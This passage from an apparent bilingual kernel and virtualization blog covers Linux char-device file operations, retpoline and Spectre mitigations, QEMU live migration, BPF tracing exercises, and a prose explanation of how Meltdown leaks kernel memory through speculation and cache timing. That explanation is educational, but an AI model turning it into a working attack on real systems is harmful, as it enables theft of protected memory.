                new = NULL;
            } else if (!cdev_get(p))
                ret = -ENXIO;
        } else if (!cdev_get(p))
            ret = -ENXIO;
        spin_unlock(&cdev_lock);
        cdev_put(new);
        if (ret)
            return ret;

        ret = -ENXIO;
        fops = fops_get(p->ops);
        if (!fops)
            goto out_cdev_put;

        replace_fops(filp, fops);
        if (filp->f_op->open) {
            ret = filp->f_op->open(inode, filp);
            if (ret)
                goto out_cdev_put;
        }

        return 0;

    out_cdev_put:
        cdev_put(p);
        return ret;
    }

‘kobj_lookup’ find the cdev in ‘cdev_map’ according the ‘i_rdev’. After succeeding find the cdev, filp’s ‘f_op’ will be replaced by our cdev’s ops which is the struct file_operations implemented in our char device driver.

Next it calls the open function in struct file_operations implemented in driver.

                             +--------------------------+
                             |   open("/dev/chr_dev")   |
                             +----------+----+----------+
                                        |    ^
                                      1 |    |
                                        v    |
                              +---------+----+-----+
                              |  do_sys_open       |
                              +--------+-----+-----+
                 inode                 |     |
                   +-----------+       |     +----------------5-------------------+
                   |           |       |                                          |
                   +-----------+       |       filp    +-------------+            |
                   |  i_fop    | <-----+               |             |            |
                   +-----------+                       +-------------+       +----+---+
              +----+  i_rdev   |                   +---+  f_op       +-------+  fd    |
              |    +-----------+                   |   +-------------+       +--------+
              |    |  i_cdev   +--------------+    |   |            ||
            2 |    +-----------+              |    |   +-------------|
              |                               |    +-------4-----------+
              +----------------------+        |                        |
                                     |        3                   +--->v+----------------+
     +-------+     +--------+   +----v----+   |                   |     |    read        |
     |       +---> |        +-> |         |   |                   |     +----------------+
     +-------+     +--------+   +----+----+   |                   |     |    write       |
  cdev_map                           |        v                   |     +----------------+
                                     +------->----------------+   |     |    ioctl       |
                                    data      |               |   |     +----------------+
                                              +---------------+   |     |    ...         |
                                              |  ops          +---+     +----------------+
                                              +---------------+         |    release     |
                                              |               |         |----------------+
                                              +---------------+            file_operations
                                               cdev

The above pic show the process of open a device file in user process.

The kernel call do_sys_open, get the file's inode and call i_fop, for char device i_fop is chrdev_open
find the cdev in cdev_map according the inode->i_rdev
assign the probe->data to inode->i_cdev, so that next no need to find in cdev_map
assign the cdev->ops to filp->f_op, so the next file system sys call can directly call the driver's file_operations through fd->fip->f_op
return the fd to user program

Let’s look an example of how to use the fd returned by the open in close function.

	SYSCALL_DEFINE1(close, unsigned int, fd)
	{
		int retval = __close_fd(current->files, fd);

		/* can't restart close syscall because file table entry was cleared */
		if (unlikely(retval == -ERESTARTSYS ||
				retval == -ERESTARTNOINTR ||
				retval == -ERESTARTNOHAND ||
				retval == -ERESTART_RESTARTBLOCK))
			retval = -EINTR;

		return retval;
	}
	EXPORT_SYMBOL(sys_close);

	int __close_fd(struct files_struct *files, unsigned fd)
	{
		struct file *file;
		struct fdtable *fdt;

		spin_lock(&files->file_lock);
		fdt = files_fdtable(files);
		if (fd >= fdt->max_fds)
			goto out_unlock;
		file = fdt->fd[fd];
		if (!file)
			goto out_unlock;
		rcu_assign_pointer(fdt->fd[fd], NULL);
		__clear_close_on_exec(fd, fdt);
		__put_unused_fd(files, fd);
		spin_unlock(&files->file_lock);
		return filp_close(file, files);

	out_unlock:
		spin_unlock(&files->file_lock);
		return -EBADF;
	}

	int filp_close(struct file *filp, fl_owner_t id)
	{
		int retval = 0;

		if (!file_count(filp)) {
			printk(KERN_ERR "VFS: Close: file count is 0\n");
			return 0;
		}

		if (filp->f_op->flush)
			retval = filp->f_op->flush(filp, id);

		if (likely(!(filp->f_mode & FMODE_PATH))) {
			dnotify_flush(filp, id);
			locks_remove_posix(filp, id);
		}
		fput(filp);
		return retval;
	}

finnally go to __fput

	static void __fput(struct file *file)
	{
		struct dentry *dentry = file->f_path.dentry;
		struct vfsmount *mnt = file->f_path.mnt;
		struct inode *inode = file->f_inode;

		might_sleep();

		fsnotify_close(file);
		/*
		* The function eventpoll_release() should be the first called
		* in the file cleanup chain.
		*/
		eventpoll_release(file);
		locks_remove_file(file);

		if (unlikely(file->f_flags & FASYNC)) {
			if (file->f_op->fasync)
				file->f_op->fasync(-1, file, 0);
		}
		ima_file_free(file);
		if (file->f_op->release)
			file->f_op->release(inode, file);
		security_file_free(file);
		if (unlikely(S_ISCHR(inode->i_mode) && inode->i_cdev != NULL &&
				!(file->f_mode & FMODE_PATH))) {
			cdev_put(inode->i_cdev);
		}
		fops_put(file->f_op);
		put_pid(file->f_owner.pid);
		if ((file->f_mode & (FMODE_READ | FMODE_WRITE)) == FMODE_READ)
			i_readcount_dec(inode);
		if (file->f_mode & FMODE_WRITER) {
			put_write_access(inode);
			__mnt_drop_write(mnt);
		}
		file->f_path.dentry = NULL;
		file->f_path.mnt = NULL;
		file->f_inode = NULL;
		file_free(file);
		dput(dentry);
		mntput(mnt);
	}

From above a can see, the kernel calls a lot of filp->f_op function, which is defined in the struct file_operations in char device driver.

retpoline: 原理与部署

2018-03-24T00:00:00+00:00

本文主要翻译自Retpoline: A Branch Target Injection Mitigation.

原理

retpoline是Google开发的针对Spectre变种2漏洞缓解利用技术。Spectre变种2利用CPU的间接分支预测(indirect branch predictor)功能，攻击者通过事先训练分支，让分支预测器去影响受害者进程，然后通过侧信道的方式来获取受害者进程的信息。其实这个变种2的漏洞利用是非常困难的，Jann Horn的利用其实也是在一个老版本的kvm上，按照 Linus的说法是利用Spectre是”fairly hard”。

目前有两种方案来缓解Spectre漏洞，即硬件方案和软件方案。硬件方案就是IBRS + IBPB，直接在硬件层面阻止投机执行 (speculative execution)，当然，这会导致性能很低，所以IBRS没有进入内核。软件方案主要就是retpoline了, 因为性能影响较低，最终得以进入内核主线。

每次CPU在快执行间接跳转的时候，比如jmp [xxx], call, 会去询问indirect branch predictor，然后投机选择一个最有可能执行的路径。retpoline就是要绕过这个indirect branch predictor，使得CPU没有办法利用其它人故意训练出来的分支路径。retpoline是 “return” 和 “trampoline”，也就是在间接跳转的时候用return指令添加了一个垫子。这个看了后文就能够理解了。

ret指令的预测跟jmp和call不太一样，ret依赖于Return Stack Buffer(RSB)。跟indirect branch predictor不一样的是，RSB是一个先进后出的stack。当执行call指令时，会push一项，执行ret时，会pop一项，这很容易由软件控制，比如下面的指令系列：

__asm__ __volatile__("       call 1f; pause;"
		     "1:     call 2f; pause;"
		     "2:     call 3f; pause;"
		     "3:     call 4f; pause;"
		     "4:     call 5f; pause;"
		     "5:     call 6f; pause;"

上图显示了retpoline的基本原理，即用一段指令代替之前的简介跳转指令，然后CPU如果投机执行会陷入一个死循环。

下面分析一下jmp间接跳转指令如何被替换成retpoline的指令。

在这个例子中，jmp通过rax的值进行间接跳转，如果没有retpoline，处理器会去询问indirect branch predictor,如果之前有攻击者去训练过这个分支，会导致CPU执行特定的一个gadget代码。下面看看retpoline是如何阻止CPU投机执行的。

“1: call load_label”这句话把”2: pause ; lfence”的地址压栈，当然也填充了RSB的一项，然后跳到load_label;
“4: mov %rax, (%rsp)”，这里把间接跳转的地址(*%rax)直接放到了栈顶，注意，这个时候内存中的栈顶地址和RSB里面地址不一样了;
如果这个时候ret CPU投机执行了，会使用第一步填充在RSB的地址进行，也就是”2: pause ; lfence”,这里是一个死循环;
最后，CPU发现了内存栈上的返回地址跟RSB自己投机的地址不一样，所以，投机执行会终止，然后跳到*%rax。

下面看看call指令被替换成retpoline的指令之后如何工作。

首先从”1: jmp label2”跳到”7: call label0”;
“7: call label0”将”8: … continue execution”的地址压入了内存栈以及RSB中，然后跳到label0;
“2: call label1”将”3: pause ; lfence”的地址压入了内存栈以及RSB中，然后跳到lable1;

这个时候内存栈和RSB如下:

“5: mov %rax, (%rsp)” 这里把间接跳转的地址(*%rax)直接放到了栈顶，注意，这个时候内存中的栈顶地址和RSB里面地址不一样了;
“6: ret”.如果这个时候ret CPU投机执行了，会使用第3步填充在RSB的地址,”3: pause ; lfence”. 这是一个死循环;
最后，CPU发现了内存栈上的返回地址跟RSB自己投机的地址不一样，所以，投机执行会终止，然后跳到*%rax;

这个时候内存栈和RSB如下

当间接地址调用(*%rax)返回的时候，通过RSB和内存中地址继续执行步骤2的压的地址，也就是8那里。

部署

由于大部分的间接跳转都是由编译器产生的，所以需要编译器的支持，目前最新的gcc已经支持了-mindirect-branch=thunk选项用于替换间接指令为retpoline系列。下面看看一个简单的例子:

#include <stdio.h>
#include <stdlib.h>

typedef void (*fp)();

void test()
{
	printf("indirect test\n");
}
int main()
{
	fp f = test;
	f();
}

上面是一个典型的间接跳转。

# gcc  -mindirect-branch=thunk  test.c  -o test
# objdump -d test

... 
00000000004004d8 <main>:
4004d8:	55                   	push   %rbp
4004d9:	48 89 e5             	mov    %rsp,%rbp
4004dc:	48 83 ec 10          	sub    $0x10,%rsp
4004e0:	48 c7 45 f8 c7 04 40 	movq   $0x4004c7,-0x8(%rbp)
4004e7:	00 
4004e8:	48 8b 55 f8          	mov    -0x8(%rbp),%rdx
4004ec:	b8 00 00 00 00       	mov    $0x0,%eax
4004f1:	e8 07 00 00 00       	callq  4004fd <__x86_indirect_thunk_rdx>
4004f6:	b8 00 00 00 00       	mov    $0x0,%eax
4004fb:	c9                   	leaveq 
4004fc:	c3                   	retq   

00000000004004fd <__x86_indirect_thunk_rdx>:
4004fd:	e8 07 00 00 00       	callq  400509 <__x86_indirect_thunk_rdx+0xc>
400502:	f3 90                	pause  
400504:	0f ae e8             	lfence 
400507:	eb f9                	jmp    400502 <__x86_indirect_thunk_rdx+0x5>
400509:	48 89 14 24          	mov    %rdx,(%rsp)
40050d:	c3                   	retq   
40050e:	66 90                	xchg   %ax,%ax
...

我们可以看到间接跳转已经被retpoline的指令系列所替换。当然，如果是一些内嵌汇编的间接跳转，则需要自己手动去增加retpoline序列。

在Linux内核中，是通过一个内核命令行参数来决定是否开启retpoline的，如果开启则内核在启动时动态替换指令。这样最大限度的减小了内核的性能损耗。

Spectre Mitigation介绍

2018-03-07T00:00:00+00:00

背景

CPU使用indirect branch predictors来进行投机执行。攻击者能够通过训练这个predictor来控制CPU执行特定的指令，然后做一些侧信道分析。这也就是spectre变种2漏洞。

Intel在硬件层面提供了3个机制用来控制indirect branch，操作系统可以利用这三个机制防止入侵者控制indirect branch predictor。这个三个机制分别是IBRS, STIBP, IBPB。本文主要介绍这三个机制以及在Linux upstream中的状态，并且从个人角度会给出一些修复建议。

Indirect Branch Control 机制介绍

CPUID.(EAX=7H,ECX=0):EDX[26]为1则表示支持IBRS和IBPB，OS可以写IA32_SPEC_CTRL[0] (IBRS) and IA32_PRED_CMD[0] (IBPB)来控制indirect branch predictor的行为。 CPUID.(EAX=7H,ECX=0):EDX[27]为1表示支持STIBP, OS可以写IA32_SPEC_CTRL[1] (STIBP)。

这里可以看到多了两个MSR，IA32_SPEC_CTRL和IA32_PRED_CMD，IBRS和STIBP通过前一个MSR控制，IBPB通过后一个MSR控制。从名字也可以看出，IBRS和STIBP是一种control，IBPB是一种command，具体来说，就是IBRS和STIBP会有状态信息，而IBPB是一种瞬时值。不恰当举例，IBRS类似于你每个月都会发工资，然后零花钱就会可以预见的增多，IBPB类似于地上捡了10块钱。

Indirect Branch Restricted Speculation (IBRS): 简单点来说，一般情况下，在高权限代码里面向IBRS的控制位写1，就能够保证indirect branch不被低权限时候train出来的predictor影响，也能够防止逻辑处理器的影响（超线程的时候）。这里权限转换就是host user-> host kernel, guest -> host等等。可以把IBRS理解成不同特权级之间的predictor隔离。 IBRS不能防止同一个级别的predictor共享，需要配合IBPB。 IBRS也不能防止RSB的污染，需要在进入特权级的时候情况RSB。

Single thread indirect branch predictors (STIBP)：超线程中，一个core的逻辑处理器会共享一个indirect branch predictor，STIBP就是禁止这种共享，防止一个逻辑处理器的predictor被另一个污染。STIBP是IBRS的一个子集，所以一般开启了IBRS就不用开STIBP了。

Indirect Branch Predictor Barrier (IBPB): IBPB类似于一个barrier, 在这之前的indirect branch predictor不会影响这之后的。

综上，IBRS和IBPB可以结合起来一起作为spectre变种2的mitigation： IBRS用于防止权限之间的predictor污染，IBPB用来阻止同一个权限下不同的实体之间的predictor污染(比如应用程序之间或者虚拟机之间)。

Linux状态及修复建议

IBRS由于性能问题最终还是没能进入内核，upstream最终选择了Google的retpoline方案，说句题外话，Google发现了漏洞，然后自己整的修复方案还进入了upstream，可以说是非常牛了，IBPB我看已经进入内核了（至少在vm切换的时候）。

个人修复建议：从上面可以看到修复方案可以有两种选择。

retpoline + IBPB， retpoline需要对内核修改比较大，并且需要编译器支持。

IBRS + IBPB， 方案比较简单，稳定性能够保证，可以只在虚拟化这边部署，guest/host用IBRS, guest/guest用IBPB。

建议可以先测测第二种方案的性能，看看损失到底几何再做决定。

参考

Speculative Execution Side Channel Mitigations

Meltdown and Spectre, explained

qemu热迁移简介

2018-03-01T00:00:00+00:00

热迁移的用法

虚拟化环境中热迁移的好处是很明显的，所以QEMU/KVM在很早就支持了热迁移。首先我们来看一下热迁移是怎么用的。按照官网指示，一般来说需要迁移的src和dst同时访问虚拟机镜像，这里为了简单起见，我们只是在两台host使用同一个虚拟机镜像。

在src启动一个虚拟机vm1：

qemu-system-x86_64  -m 2048   -hda centos.img  -vnc :0 --enable-kvm

在dst启动另一个虚拟机vm2：

qemu-system-x86_64  -m 2048   -hda centos.img  -vnc :0 --enable-kvm -incoming tcp:0:6666

在vm1的的monitor里面输入:

migrate tcp:$ip:6666

隔了十几秒可以看到vm2已经成为了vm1的样子，vm1处于stop状态。

热迁移的基本原理

首先看看热迁移过程中qemu的哪些部分会包含进来。上图中间的灰色部分是虚拟机的内存，它对于qemu来说是完全的黑盒，qemu不会做任何假设，而只是一股脑儿的发送到dst。左边的区域是表示的设备状态，这部分是虚拟机可见的，qemu使用自己的协议来发送这部分。右边的是不会迁移的部分，但是还是将dst和src保持一致，所以一般来说，src和dst的虚拟机使用相同的qemu command line能够保证这部分一致。

需要满足很多条件才能进行热迁：

使用共享存储，如NFS
host的时间要一致
网络配置要一致，不能说src能访问某个网络，dst不能
host CPU类型要一致，毕竟host导出指令集给guest
虚拟机的机器类型，QEMU版本，rom版本等

热迁移主要包括三个步骤：

将虚拟机所有RAM设置成dirty，主要函数:ram_save_setup
持续迭代将虚拟机的dirty RAM page发送到dst，直到达到一定条件，不如dirty page数量比较少, 主要函数:ram_save_iterate
停止src上面的guest，把剩下的dirty RAM发送到dst，之后发送设备状态，主要函数: qemu_savevm_state_complete_precopy

其中步骤1和步骤2是上图中的灰色区域，步骤3是灰色和左边的区域。

之后就可以在dst上面继续运行qemu程序了。

发送端源码分析

在qemu的monitor输入migrate命令后，经过的一些函数：

hmp_migrate
  ->qmp_migrate
      ->tcp_start_outgoing_migration
          ->socket_start_outgoing_migration
              ->socket_outgoing_migration
                  ->migration_channel_connect
                      ->qemu_fopen_channel_output
                      ->migrate_fd_connect

最后这个函数就重要了，创建了一个迁移线程，线程函数为migration_thread

void migrate_fd_connect(MigrationState *s)
{
    xxx 

    qemu_thread_create(&s->thread, "migration", migration_thread, s,
                    QEMU_THREAD_JOINABLE);
    s->migration_thread_running = true;
}


static void *migration_thread(void *opaque)
{

    xxx
    qemu_savevm_state_begin(s->to_dst_file, &s->params);

    xxx
    while (s->state == MIGRATION_STATUS_ACTIVE ||
        s->state == MIGRATION_STATUS_POSTCOPY_ACTIVE) {
        xxx
        if (!qemu_file_rate_limit(s->to_dst_file)) {
            uint64_t pend_post, pend_nonpost;

            qemu_savevm_state_pending(s->to_dst_file, max_size, &pend_nonpost,
                                    &pend_post);
            xxx
            if (pending_size && pending_size >= max_size) {
                xxx
                /* Just another iteration step */
                qemu_savevm_state_iterate(s->to_dst_file, entered_postcopy);
            } else {
                migration_completion(s, current_active_state,
                                    &old_vm_running, &start_time);
                break;
            }
        }

        xxx
}

migration_thread主要就是用来完成之前提到的热迁移三个步骤。首先来看第一个步骤，qemu_savevm_state_begin标记所有RAM为dirty:

qemu_savevm_state_begin
-->ram_save_setup
    -->ram_save_init_globals
            -->bitmap_new
            -->bitmap_set

接着看第二个步骤，由migration_thread中的while循环中的两个函数完成: qemu_savevm_state_pending和qemu_savevm_state_iterate。

第一个函数通过调用回调函数ram_save_pending确定还要传输的字节数，比较简单。第二个函数通过调用回调函数ram_save_iterate用来把dirty传到dst上面。

ram_save_iterate –>ram_find_and_save_block –>find_dirty_block –>ram_save_host_page –>ram_save_target_page –>migration_bitmap_clear_dirty –>ram_save_page –>qemu_put_buffer_async –>…->qemu_fflush –>…->send

在while循环中反复调用ram_save_pending和ram_save_iterate不停向dst发送虚拟机脏页，直到达到一定的条件，然后进入第三个步骤。

第三个步骤就是在migration_thread中调用migration_completion，在这一步中会停止src虚拟机，然后把最后剩的一点脏页拷贝到dst去。

migration_completion
-->vm_stop_force_state
-->bdrv_inactivate_all
-->qemu_savevm_state_complete_precopy
    -->ram_save_complete
            -->ram_find_and_save_block

可以看到最后一个函数跟第二个阶段传输脏页一样了。

接收端源码分析

接收端的qemu运行参数跟发送端的一样，但是多了一个参数-incoming tcp:0:6666, qemu在解析到-incoming后，就会等待src迁移过来，我们来看看这个流程。

main –>qemu_start_incoming_migration –>tcp_start_incoming_migration –>socket_start_incoming_migration –>socket_accept_incoming_migration –>migration_channel_process_incoming –>qemu_fopen_channel_input –>migration_fd_process_incoming –>process_incoming_migration_co –>qemu_loadvm_state ..->bdrv_invalidate_cache_all

process_incoming_migration_co函数用来完成接收数据，恢复虚拟机的运行。最重要的是qemu_loadvm_state，用于接收数据，在dst重构虚拟机。

int qemu_loadvm_state(QEMUFile *f)
{
    xxx  检查版本

    ret = qemu_loadvm_state_main(f, mis);
    
    xxx
    cpu_synchronize_all_post_init();

    return ret;
}

显然，qemu_loadvm_state_main是构建虚拟机的主要函数。

static int qemu_loadvm_state_main(QEMUFile *f, MigrationIncomingState *mis)
{
    uint8_t section_type;
    int ret = 0;

    while ((section_type = qemu_get_byte(f)) != QEMU_VM_EOF) {
        ret = 0;
        trace_qemu_loadvm_state_section(section_type);
        switch (section_type) {
        case QEMU_VM_SECTION_START:
        case QEMU_VM_SECTION_FULL:
            ret = qemu_loadvm_section_start_full(f, mis);
            if (ret < 0) {
                goto out;
            }
            break;
        case QEMU_VM_SECTION_PART:
        case QEMU_VM_SECTION_END:
            ret = qemu_loadvm_section_part_end(f, mis);
            if (ret < 0) {
                goto out;
            }
            break;
        case QEMU_VM_COMMAND:
            ret = loadvm_process_command(f);
            trace_qemu_loadvm_state_section_command(ret);
            if ((ret < 0) || (ret & LOADVM_QUIT)) {
                goto out;
            }
            break;
        default:
            error_report("Unknown savevm section type %d", section_type);
            ret = -EINVAL;
            goto out;
        }
    }

out:
    if (ret < 0) {
        qemu_file_set_error(f, ret);
    }
    return ret;
}

qemu_loadvm_state_main在一个循环里面处理各个section, src会把QEMU_VM_SECTION_START等标志放到流中。

qemu_loadvm_section_start_full
  -->find_se
  -->vmstate_load
       -->ram_load
            -->qemu_get_buffer

最后一个函数负责把接收到的数据拷贝到dst这端虚拟机内存上。本文就是对热迁移的简单分析，后面会对一些具体的问题进行分析。

参考

Amit Shah: Live Migrating QEMU-KVM Virtual Machines

meltdown漏洞小白理解

2018-01-04T00:00:00+00:00

这篇文章的目的是帮助像我一样的小白快速理解meltdown漏洞。

直接上图

漏洞引起的根源还是CPU的推测执行。上图1,2,3三条指令表面上看是依次执行的，但是实际上呢，只能的CPU早就开始并行执行了，当然是为了提高效率。比如上面在执行指令1的时候也可以同时执行指令2,3。当然，因为执行指令1的时候出错了，依赖于此的后续指令虽然已经执行了，但是并不会提交到寄存器，也就是说CPU其实白忙活了, rax, rbx的数据并不会被改变。这叫做CPU预测出错回滚。问题就出在这个回滚上，表面看上似乎各种寄存器/架构状态都回滚回去了，但是其实TLB或者缓存并没有回滚。

正常情况下执行指令1的时候由于我们直接在用户态访问内核地址，肯定是访问不了的。但是在CPU层面，其实权限检查和数据读取时分开的，当然也是为了提高效率。CPU在读取了内核地址的数据之后，也就是1a执行了，然后由于预测执行，也在并行执行2,3指令，如果执行完了2,3指令，还没有执行到1b这部分，也就是没有设置异常的一个flag，这个时候3的指令就会把rbx+rax*4096地址里面的数据读到缓存中。我们在2中把这个指令左移了0xc位，所以相当于乘了4096。我们把rax*4096用于访问一个数组，所以rbx+rax*4096就会被缓存了。那这个时候CPU再执行1b发现权限不对开始回滚，但是由于缓存没有清理，所以这个数据还在缓存里面。

这个时候我们就可以对rbx + i*4096这些位置进行访问了。由于我们只有一个地址被缓存了，所以访问其中某一个地址用的时间会大大小于其他地址，所以我们就才出了相应的内存地址的值。这就是所谓的侧信道攻击。

linux-tracing-workshop-part 3

2017-12-13T00:00:00+00:00

记录linux-tracing-workshop实验过程，第三部分共三篇。

13. Using BPF Tools: trace and argdist One-Liners
14. Using BPF Tools: CPU and Off-CPU Investigation
15. Using perf Tools: Slow File I/O

13. Using BPF Tools: trace and argdist One-Liners

使用trace显示所有登陆尝试

每当登陆系统或者使用su时，都有set*uid被调用，据此可以用trace记录所有系统的登陆和sudo操作。

    root@ubuntu1604:/usr/share/bcc/tools# ./trace '::sys_setuid "uid=%d", arg1'
    PID    TID    COMM         FUNC             -
    53999  53999  sshd         sys_setuid       uid=0
    54050  54050  su           sys_setuid       uid=1000
    54076  54076  cron         sys_setuid       uid=0
    54103  54103  cron         sys_setuid       uid=0

使用argdist指出热门文件

argdist显示函数参数的分布，可以用来trace __vfs_write 和 __vfs_read的参数用以判断出热门文件。在一个终端启动argdist，另一个终端启动一个dd：

    dd if=/dev/zero of=/dev/null bs=1K count=1M

下面是显示结果：

    root@ubuntu1604:/usr/share/bcc/tools# ./argdist -T 5 -i  2 -C 'p::__vfs_write(struct file *f):char*:f->f_path.dentry->d_name.name#writes'   -C 'p::__vfs_read(struct file  *f):char*:f->f_path.dentry->d_name.name#reads'
    [16:11:05]
    writes
            COUNT      EVENT
            1          f->f_path.dentry->d_name.name = kprobe_events
            3          f->f_path.dentry->d_name.name = [eventfd]
            3          f->f_path.dentry->d_name.name = 1
            7          f->f_path.dentry->d_name.name = TCP
    reads
            COUNT      EVENT
            1          f->f_path.dentry->d_name.name = inotify
            1          f->f_path.dentry->d_name.name = [timerfd]
            3          f->f_path.dentry->d_name.name = [eventfd]
            24         f->f_path.dentry->d_name.name = ptmx
    [16:11:07]
    writes
            COUNT      EVENT
            9          f->f_path.dentry->d_name.name = 1
            24         f->f_path.dentry->d_name.name = TCP
    reads
            COUNT      EVENT
            18         f->f_path.dentry->d_name.name = ptmx
    [16:11:09]
    writes
            COUNT      EVENT
            1          f->f_path.dentry->d_name.name = TCP
            1          f->f_path.dentry->d_name.name = 4
            6          f->f_path.dentry->d_name.name = 1
            15         f->f_path.dentry->d_name.name = TCP
            505475     f->f_path.dentry->d_name.name = null
    reads
            COUNT      EVENT
            1          f->f_path.dentry->d_name.name = TCP
            2          f->f_path.dentry->d_name.name = ld-2.23.so
            3          f->f_path.dentry->d_name.name = dd
            28         f->f_path.dentry->d_name.name = ptmx
            505475     f->f_path.dentry->d_name.name = zero

使用trace显示PostgreSQL的查询

本节直接用trace跟踪postgresql的USDT probe。

启动postgres，连到对应的数据库:

    test@ubuntu1604:/usr/local/pgsql/bin$ ./psql  -d postgres

    postgres=# \c foo
    You are now connected to database "foo" as user "test".
    foo=# select * from tbl

多次查找尝试找到对应的插入操作的进程为54397。

    ^Croot@ubuntu1604:/usr/share/bcc/tools# ps aux | grep postgres
    test     49781  0.0  0.8 172968 16660 pts/0    S    Dec06   0:00 /usr/local/pgsql/bin/postgres -D /tmp/pgdata
    test     49784  0.0  0.2 173112  4664 ?        Ss   Dec06   0:00 postgres: checkpointer   
    test     49785  0.0  0.2 172968  5000 ?        Ss   Dec06   0:00 postgres: background writer   
    test     49786  0.0  0.4 172968  8192 ?        Ss   Dec06   0:01 postgres: walwriter   
    test     49787  0.0  0.3 173624  6440 ?        Ss   Dec06   0:00 postgres: autovacuum launcher   
    test     49788  0.0  0.1  28052  2280 ?        Ss   Dec06   0:01 postgres: stats collector   
    test     49789  0.0  0.1 173396  3824 ?        Ss   Dec06   0:00 postgres: logical replication launcher   
    test     54372  0.0  0.2  34240  4100 pts/1    S+   16:39   0:00 ./psql -d postgres
    test     54397  0.0  0.5 173904 11152 ?        Ss   16:41   0:00 postgres: test foo [local] idle
    root     54400  0.0  0.0  15784   932 pts/4    S+   16:42   0:00 grep --color=auto postgres
    -
    ^Croot@ubuntu1604:/usr/share/bcc/tools# ./trace -p 54397 'u:/usr/local/pgsql/bin/postgres:query__start "%s", arg1'
    PID    TID    COMM         FUNC             -
    54397  54397  postgres     query__start     select * from tbl

使用argdist显示postgresql的延时分布

    argdist -c -i 5 -H 'r:/usr/local/pgsql/bin/postgres:PortalRun():u64:$latency/1000000#latency (ms)'

将pg-slow.sql拷到/tmp, 然后在pgsql命令行执行

    foo=# \i /tmp/pg-slow.sql

输出：

    root@ubuntu1604:/usr/share/bcc/tools# ./argdist -c -i 5 -H 'r:/usr/local/pgsql/bin/postgres:PortalRun():u64:$latency/1000000#latency (ms)'
    [17:18:00]
    latency (ms)        : count     distribution
            0 -> 1          : 1        |****************************************|
    [17:18:05]
    latency (ms)        : count     distribution
    0 -> 1          : 1        |********                                |
    2 -> 3          : 0        |                                        |
    4 -> 7          : 0        |                                        |
    8 -> 15         : 0        |                                        |
    16 -> 31         : 0        |                                        |
    32 -> 63         : 0        |                                        |
    64 -> 127        : 0        |                                        |
    128 -> 255        : 5        |****************************************|
    256 -> 511        : 0        |                                        |
    512 -> 1023       : 0        |                                        |
    1024 -> 2047       : 0        |                                        |
    2048 -> 4095       : 0        |                                        |
    4096 -> 8191       : 1        |********                                |

14. Using BPF Tools: CPU and Off-CPU Investigation

该实验调查一个表面上是CPU-bound的程序，但是实际有大部分时间没有使用CPU。

编译运行：

    root@ubuntu1604:~/linux-tracing-workshop# gcc -g -fno-omit-frame-pointer -fno-inline -pthread  blocky.c -o blocky
    root@ubuntu1604:~/linux-tracing-workshop# ./blocky 
    [*] Ready to process requests.
    [*] Backend handler initialized.
    [*] Request processor initialized.
    [*] Request processor initialized.
    [-] Handled 1000 requests.
    [-] Handled 2000 requests.

看起来在以稳定的频率处理请求。

但是用top可以看到blocky的CPU利用率是很低的，说明很多时候它并没有在用CPU。

    root@ubuntu1604:/usr/share/bcc/tools# ./profile -F 997 -f -p $(pidof blocky) > folded-stacks
    root@ubuntu1604:/usr/share/bcc/tools# ~/FlameGraph/flamegraph.pl folded-stacks > profile.svg

生成火焰图，从火焰图可以看到 request_processor 和 do_work消耗了比较多的CPU, 也可以看到程序经常需要陷入对锁的等待中。

下面用cpudist查看on-cpu和off-cpu的时间各花费了多少时间：

    test@ubuntu:/usr/share/bcc/tools$ sudo ./cpudist  -p $(pidof blocky)
    [sudo] password for test: 
    Tracing on-CPU time... Hit Ctrl-C to end.
    ^C
    usecs               : count     distribution
-> 1          : 0        |                                        |
-> 3          : 3        |***************                         |
-> 7          : 3        |***************                         |
-> 15         : 2        |**********                              |
-> 31         : 5        |*************************               |
-> 63         : 3        |***************                         |
-> 127        : 5        |*************************               |
-> 255        : 1        |*****                                   |
-> 511        : 2        |**********                              |
-> 1023       : 1        |*****                                   |
-> 2047       : 0        |                                        |
-> 4095       : 3        |***************                         |
-> 8191       : 8        |****************************************|
-> 16383      : 2        |**********                              |

从上面可以看到是双峰分布，有两个计算比较密集的点，一个比较短，一个比较长。需要关注比较短的，这说明程序在换进换出。看看off-cpu的值：

    test@ubuntu:/usr/share/bcc/tools$ sudo ./cpudist -O -p $(pidof blocky)
    Tracing off-CPU time... Hit Ctrl-C to end.
    ^C
    usecs               : count     distribution
-> 1          : 2        |                                        |
-> 3          : 1        |                                        |
-> 7          : 4        |                                        |
-> 15         : 7        |                                        |
-> 31         : 7        |                                        |
-> 63         : 3        |                                        |
-> 127        : 48       |***                                     |
-> 255        : 93       |******                                  |
-> 511        : 28       |*                                       |
-> 1023       : 11       |                                        |
-> 2047       : 10       |                                        |
-> 4095       : 6        |                                        |
-> 8191       : 6        |                                        |
-> 16383      : 580      |****************************************|
-> 32767      : 556      |**************************************  |

我们看到也是一个双峰分布，表示程序waiting的时间。但是这些睡眠是哪里来的，使用offcputime可以知道这个答案：

    test@ubuntu:/usr/share/bcc/tools$ sudo ./offcputime -f -p $(pidof blocky) > ~/folded-stacks
    [sudo] password for test: 
    ^Ctest@ubuntu:/usr/share/bcc/tools$ ls ~
    ...
    test@ubuntu:/usr/share/bcc/tools$ ~/FlameGraph/flamegraph.pl ~/folded-stacks > offcpu.svg
    bash: offcpu.svg: Permission denied
    test@ubuntu:/usr/share/bcc/tools$ ~/FlameGraph/flamegraph.pl ~/folded-stacks > ~/offcpu.svg
    test@ubuntu:/usr/share/bcc/tools$ 

从火焰图可以看到确实有两条路径在等待，一个是在backend_handler调用nanosleep，一个是在request_processor调用__lll_lock_wait:

15. Using perf Tools: Slow File I/O

这个实验跟之前一样，只是这次用perf并且用火焰图显示写文件的路径。

编译运行logger:

    root@ubuntu1604:~/linux-tracing-workshop# gcc -g -fno-omit-frame-pointer -O0 -pthread logger.c -o logger
    root@ubuntu1604:~/linux-tracing-workshop# ./logger 

从iolatency可以看到大部分io都能很快完成，但是也有比较慢的io:

    root@ubuntu1604:~/perf-tools# ./iolatency 
    Tracing block I/O. Output every 1 seconds. Ctrl-C to end.

    >=(ms) .. <(ms)   : I/O      |Distribution                          |
-> 1       : 92       |###############################       |
-> 2       : 114      |######################################|
-> 4       : 3        |#                                     |
-> 8       : 3        |#                                     |
-> 16      : 8        |###                                   |

    >=(ms) .. <(ms)   : I/O      |Distribution                          |
-> 1       : 103      |##################################    |
-> 2       : 117      |######################################|
-> 4       : 4        |##                                    |
-> 8       : 1        |#                                     |
-> 16      : 4        |##                                    |

    >=(ms) .. <(ms)   : I/O      |Distribution                          |
-> 1       : 96       |##################################    |
-> 2       : 108      |######################################|
